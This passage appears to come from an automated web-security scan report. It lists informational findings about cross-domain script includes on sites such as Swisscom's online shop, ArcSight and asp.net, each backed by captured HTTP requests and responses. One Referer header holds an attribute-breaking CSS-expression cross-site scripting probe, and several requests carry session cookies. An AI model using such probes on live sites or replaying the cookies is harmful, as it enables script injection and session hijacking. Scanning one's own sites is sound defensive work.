GET /onlineshop/Pages/ProductDetail/ProductDetail.aspx?cat=OS_Festnetz(MasterProducts)&subcat=OS_Fax(MasterProducts)&drilldown=4&subsubcat=OS_Normalpapier_Fax(MasterProducts)&id=000000000000125092(MasterProducts)&lang=EN HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Fax&drilldown=3
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CP=null*; s_cc=true; CTQ=second; s_nr=1303671130460-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_fax/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/ProductDetail/ProductDetail.aspx%25253Fcat%25253DOS_Fe%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 18:56:31 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 48310


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Swisscom O
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...

24.201. http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://swisscomonlineshop.sso.bluewin.ch
Path:   /onlineshop/Pages/Products/Products.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlineshop/Pages/Products/Products.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=7&lang=EN&nsextt= HTTP/1.1
Host: swisscomonlineshop.sso.bluewin.ch
Proxy-Connection: keep-alive
Referer: http://swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Category/Category.aspx?cat=OS_Festnetz&subcat=OS_Telefone&drilldown=3&lang=EN&nsextt=%22%20stYle=%22x:expre/**/ssion(netsparker(9))
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=D6823650BEAC998941EFBDC8B981ED5B; s_vnum=1306263089583%26vn%3D1; CTQ=second; CP=null*; s_cc=true; s_nr=1303671308852-New; undefined_s=First%20Visit; s_invisit=true; s_one_campaign=oshop%3Anone; s_visit=1; B=oshop; s_sq=swisscom-onelive%3D%2526pid%253Doshop/en/os_festnetz/os_telefone/category%2526pidt%253D1%2526oid%253Dhttp%25253A//swisscomonlineshop.sso.bluewin.ch/onlineshop/Pages/Products/Products.aspx%25253Fcat%25253DOS_Festnetz%252526sub%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:18:35 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html;charset=utf-8
Connection: close
Content-Length: 105054


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head><title>
   Fixed netw
...[SNIP]...
</script>

<script src="http://s7.addthis.com/js/250/addthis_widget.js#username=swisscom1" type="text/javascript"></script>
...[SNIP]...
<div id="ctl00_contentPlaceholderHeader_headerControl_ExternalHeaderContent" class="ContentExternalHeader">
<script src="http://www.bluewin.ch/js/osn/osn_header.js" type="text/javascript"></script>
...[SNIP]...
<div class="FullBanner"><script src="http://de.swisscom.ch/js/swfobject.js" type="text/javascript">
if(typeof deconcept=="undefined"){var deconcept=new Object();}if(typeof deconcept.util=="undefined"){deconcept.util=new Object();}if(typeof deconcept.SWFObjectUtil=="undefined"){deconcept.SWFObjectUti
...[SNIP]...
</script>
<script src="http://sc.swisscom.ch/js/osn/s_one_code.js" type="text/javascript" ></script>
...[SNIP]...

24.202. http://technet.microsoft.com/en-us/edge/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://technet.microsoft.com
Path:   /en-us/edge/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /en-us/edge/ HTTP/1.1
Host: technet.microsoft.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: A=I&I=AxUFAAAAAADYBwAAu2WtoptBCfDaQruVeUcU/w!!&M=1; WT_NVR=0=/:1=en-us:2=en-us/security; MUID=B506C07761D7465D924574124E3C14DF; MC1=GUID=845eef4a7ff18745a494666b76292718&HASH=4aef&LV=20114&V=3; msdn=L=1033; ixpLightBrowser=0; s_nr=1303567265614-New; _opt_vi_DANG4OLL=2A807526-0B45-4F67-8001-CE6244FF15CF; MSID=Microsoft.CreationDate=04/19/2011 11:23:33&Microsoft.LastVisitDate=04/23/2011 14:01:21&Microsoft.VisitStartDate=04/23/2011 13:49:08&Microsoft.CookieId=64491e77-08ce-4e1f-9bac-3648a81416de&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0253-8586-9443-3504; ADS=SN=175A21EF; omniID=1303134620609_e49b_0c9c_6cf1_45f64f5a5361; s_cc=true; s_sq=%5B%5BB%5D%5D; WT_FPC=id=173.193.214.243-2082981296.30145999:lv=1303649859266:ss=1303649859266; WT_NVR_RU=0=technet|msdn:1=:2=; Sto.UserLocale=en-us

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:58 GMT
Content-Length: 38351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
</script><script type="text/javascript" src="http://Ads1.msn.com/library/dap.js"></script>
...[SNIP]...

24.203. http://visitmix.com/writings/how-crud-is-your-design  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://visitmix.com
Path:   /writings/how-crud-is-your-design

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /writings/how-crud-is-your-design HTTP/1.1
Host: visitmix.com
Proxy-Connection: keep-alive
Referer: http://visitmix.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.5
X-Pingback: http://visitmix.com/xmlrpc.php
Link: <http://visitmix.com/?p=11715>; rel=shortlink
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 17:05:51 GMT
Content-Length: 28974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<!-- Ide
...[SNIP]...
</div>

   <script type="text/javascript" src="http://ajax.microsoft.com/ajax/jQuery.Validate/1.6/jQuery.Validate.min.js"></script>
...[SNIP]...

24.204. http://windowsclient.net/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://windowsclient.net
Path:   /default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /default.aspx HTTP/1.1
Host: windowsclient.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CommunityServer: 3.0.20416.853
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:48 GMT; expires=Mon, 23-Apr-2012 15:57:48 GMT; path=/
Set-Cookie: CommunityServer-LastVisitUpdated-2101=; path=/
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Sun, 24 Apr 2011 11:57:48 GMT; expires=Mon, 23-Apr-2012 15:57:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=bqwdsc55oqlmmxy41sopjw55; path=/; HttpOnly
Set-Cookie: CSAnonymous=9034d616-8493-4d07-ad53-fcf4c9dd05c7; expires=Sun, 24-Apr-2011 16:17:48 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:47 GMT
Content-Length: 61655


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

   
       
...[SNIP]...
<iframe src="http://ads.asp.net/a.aspx?ZoneID=105&Task=Get&PageID=68996&SiteID=4" width="300" height="263" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no">
<script language="javascript" src="http://ads.asp.net/a.aspx?ZoneID=105&Task=Get&PageID=68996&SiteID=4"></script>
...[SNIP]...
<iframe src="http://ads.asp.net/a.aspx?ZoneID=203&Task=Get&PageID=68996&SiteID=4" width="300" height="263" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no">
<script language="javascript" src="http://ads.asp.net/a.aspx?ZoneID=203&Task=Get&PageID=68996&SiteID=4"></script>
...[SNIP]...
<iframe src="http://ads.asp.net/a.aspx?ZoneID=483&Task=Get&PageID=68996&SiteID=4" width="468" height="60" marginwidth="0" marginheight="0" hspace="0" vspace="0" frameborder="0" scrolling="no">
<script language="javascript" src="http://ads.asp.net/a.aspx?ZoneID=483&Task=Get&PageID=68996&SiteID=4"></script>
...[SNIP]...
</script>

<script type="text/javascript" language="javascript" src="http://www.bing.com/bootstrap.js?ServId=SearchBox&ServId=SearchBoxWeb&Callback=WLSearchBoxScriptReady"></script>
...[SNIP]...

24.205. http://www.actividentity.com/device_identification_for_user_authentication  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /device_identification_for_user_authentication

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /device_identification_for_user_authentication?gclid=CNnXlJP1tagCFQ5-5Qodm1pYEg HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:55:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t1.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

24.206. http://www.actividentity.com/support/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.actividentity.com
Path:   /support/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /support/ HTTP/1.1
Host: www.actividentity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=262184092.1303674298.1.1.utmgclid=CNnXlJP1tagCFQ5-5Qodm1pYEg|utmccn=(not%20set)|utmcmd=(not%20set); __utma=262184092.1583896653.1303674298.1303674298.1303674298.1; __utmc=262184092; PHPSESSID=2knt766ulmukoda54fr91gtu97

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:43:40 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t1.trackalyzer.com/trackalyze.js"></script>
...[SNIP]...

24.207. http://www.arcsight.com/blog/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /blog/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /blog/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; exp_last_activity=1303692408; exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utmb=226624333

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:02 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694042; expires=Mon, 23-Apr-2012 20:14:02 GMT; path=/
Set-Cookie: exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:02 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 36869

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<link rel="alternate" type="application/rss+xml" href="http://feeds.feedburner
...[SNIP]...
<div style="margin-top: 30px;"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<!--END WRAPPER-->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

24.208. http://www.arcsight.com/products/products-esm/arcsight-express/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-esm/arcsight-express/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/products-esm/arcsight-express/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
Referer: http://www.arcsight.com/products/products-identity/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; exp_last_activity=1303692257; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmb=226624333; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:34 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694014; expires=Mon, 23-Apr-2012 20:13:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:13:34 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 32216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight Express -
...[SNIP]...
<!--END WRAPPER-->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

24.209. http://www.arcsight.com/products/products-identity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-identity/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/products-identity/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:09 GMT
Server: Apache
Set-Cookie: exp_last_visit=988332429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_last_activity=1303692429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:47:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight IdentityV
...[SNIP]...
<!--END WRAPPER-->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

24.210. http://www.arcsight.com/supportportal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /supportportal/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /supportportal/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; __utmb=226624333; exp_last_activity=1303692410; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:54 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694094; expires=Mon, 23-Apr-2012 20:14:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsupportportal%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:54 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Welcome to the Arc
...[SNIP]...
<!--END WRAPPER-->


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script><SCRIPT type="text/javascript" src="https://lct.salesforce.com/sfga.js"></SCRIPT>
...[SNIP]...

24.211. http://www.asp.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asp.net
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.asp.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 16:00:28 GMT
Content-Length: 11736


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home: The Offic
...[SNIP]...
<link href="/rss/spotlight" type="application/rss+xml" rel="alternate" />
<script src="http://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.4.4.min.js" type="text/javascript"></script>
...[SNIP]...

24.212. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /widgets/fan.php?api_key=0235066d8a4432981843fd205ce15e37&channel_url=http%3A%2F%2Fwww.infusionblog.com%2F%3Ffbc_channel%3D1&id=54368662036&name=&width=200&connections=9&stream=0&logobar=0&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.64.107
X-Cnection: close
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/3vRlwVFfVQv.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yU/r/I8QAd_a7Pbh.js"></script>
...[SNIP]...

24.213. http://www.creditchecktotal.com/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /default.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /default.aspx?sc=669023&bcd=EYypxrx2&mkwid=sEYypxrx2&pcrid=7154421312&kwid=credit%20monitoring HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
